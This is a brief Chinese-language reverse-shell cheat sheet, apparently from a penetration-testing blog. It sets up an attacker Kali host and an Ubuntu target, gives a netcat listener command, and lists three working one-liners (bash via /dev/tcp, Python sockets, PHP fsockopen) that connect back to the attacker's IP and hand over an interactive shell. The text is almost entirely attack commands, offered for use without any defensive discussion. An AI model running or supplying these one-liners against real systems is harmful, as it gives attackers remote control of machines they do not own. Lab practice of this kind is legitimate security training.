准备:
hacker: 192.168.188.63 (kali)
目标: 192.168.72.130 (ubuntu)
kali监听指定端口:
nc -lvp 1234
反弹shell:
ubuntu下
方法一 bash:
bash -i >& /dev/tcp/192.168.188.63/1234 0>&1
方法二 python:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.188.63",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
方法三 php:
php -r '$sock=fsockopen("192.168.188.63",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
![实战打靶集锦-005-HL1. 主机发现2. 端口扫描3. 服务枚举4. 服务探查5 公共EXP搜索6. 再次目录枚举7. 突破边界8 提权9 获取flag[图]](data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACwAAAAAAQABAAACAkQBADs=)